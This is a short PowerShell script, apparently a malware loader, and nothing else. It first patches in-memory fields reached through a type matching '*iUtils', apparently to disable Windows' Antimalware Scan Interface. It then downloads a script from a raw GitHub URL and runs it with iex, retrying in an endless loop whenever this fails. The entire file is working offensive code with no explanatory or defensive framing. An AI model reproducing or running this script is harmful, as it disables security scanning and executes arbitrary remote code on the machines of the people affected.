while(1){
try{
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);$ptr = [System.IntPtr]::Add([System.IntPtr]$g, 0x8);$buf = New-Object byte[](8);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 8)
iex((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/4kr4m0/ps/refs/heads/main/ps.txt'))
}
catch{
Start-Sleep -Seconds 10
continue
}
}
read-host
